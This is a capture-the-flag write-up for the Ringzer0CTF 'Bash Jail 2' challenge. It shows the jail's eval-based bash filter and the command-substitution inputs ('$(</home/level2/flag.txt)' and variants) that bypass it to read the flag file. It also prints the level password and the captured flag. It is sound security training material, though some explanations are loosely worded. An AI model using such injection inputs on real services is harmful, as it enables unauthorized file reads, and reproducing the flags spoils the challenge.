I"n
<p>It’s a write-up about the challenge : <a href="https://ringzer0ctf.com/challenges/30">Ringzer0CTF - Bash Jail 2</a></p>

<h1 id="challenge-30---bash-jail-2">Challenge 30 - Bash Jail 2</h1>

<h2 id="1-challenge">1. Challenge</h2>

<p>After login into the level2 with this command : 
<code class="language-plaintext highlighter-rouge">ssh -l level2 -p 10219 challenges.ringzer0team.com</code>
and this password : FLAG-U96l4k6m72a051GgE5EN0rA85499172K</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
</pre></td> --><td class="rouge-code"><pre>RingZer0 Team Online CTF

BASH Jail Level 2:
Current user is uid=1001(level2) gid=1001(level2) groups=1001(level2)

Flag is located at /home/level2/flag.txt

Challenge bash code:
-----------------------------

function check_space {
	if [[ $1 == *[bdks';''&amp;'' ']* ]]
	then 	
    		return 0
	fi

	return 1
}

while :
do
	echo "Your input:"
	read input
	if check_space "$input" 
	then
		echo -e '\033[0;31mRestricted characters has been used\033[0m'
	else
		output="echo Your command is: $input"
		eval $output
	fi
done 

-----------------------------
Your input:
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="2-solution">2. Solution</h2>

<p>Some characters like “;” “&amp;” “]” “b”, “d” are not allowed because of the test with the function check_space.
This is why, we tried this : <code class="language-plaintext highlighter-rouge">$(&lt;/home/level2/flag.txt)</code> to read the flag.
The result was :</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><!-- <td class="rouge-gutter gl"><pre class="lineno">1
</pre></td> --><td class="rouge-code"><pre>Your command is: FLAG-a78i8TFD60z3825292rJ9JK12gIyVI5P
</pre></td></tr></tbody></table></code></pre></div></div>

<p>To avoid the space, we can use the command substitution <code class="language-plaintext highlighter-rouge">&lt;</code>.
So, we will have the same result with this command :
<code class="language-plaintext highlighter-rouge">$(cat&lt;flag.txt)</code> or this one <code class="language-plaintext highlighter-rouge">$(&lt;flag.txt)</code></p>

<p>We can use <code class="language-plaintext highlighter-rouge">`</code> instead of <code class="language-plaintext highlighter-rouge">$</code> also.</p>

<p>The flag is : <strong>FLAG-a78i8TFD60z3825292rJ9JK12gIyVI5P</strong></p>
:ET